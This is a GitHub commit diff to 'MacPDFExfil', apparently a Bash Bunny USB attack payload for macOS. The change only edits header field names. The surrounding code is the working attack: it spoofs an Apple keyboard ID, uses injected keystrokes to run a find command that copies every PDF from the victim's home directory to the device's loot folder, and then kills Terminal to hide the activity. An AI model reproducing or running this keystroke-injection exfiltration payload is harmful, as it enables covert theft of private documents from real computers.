Cleanup: MacPDFExfil: Update Payload Header

This commit is contained in:
Marc 2019-07-05 08:35:47 +01:00 committed by GitHub
parent b2731e7e97
commit 83e5702639
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -4,9 +4,9 @@
# Author: k1ul3ss
# Props: audibleblink
# Version: 1.0
# Category: Exfiltration
# Target: macOS
# Attackmodes: HID, Storage
# Targets: macOS
# Attack Modes: HID, Storage
# Description: Finds all PDFs in the users Home directory, and then copies them to the Bunnys storage.
ATTACKMODE STORAGE HID VID_0X05AC PID_0X021E
@ -28,4 +28,4 @@ QUACK STRING find \~ -name \'*.pdf\' -exec cp \"{}\" $lootdir \\\;\; killall Ter
QUACK ENTER
# sync the filesystem
sync
sync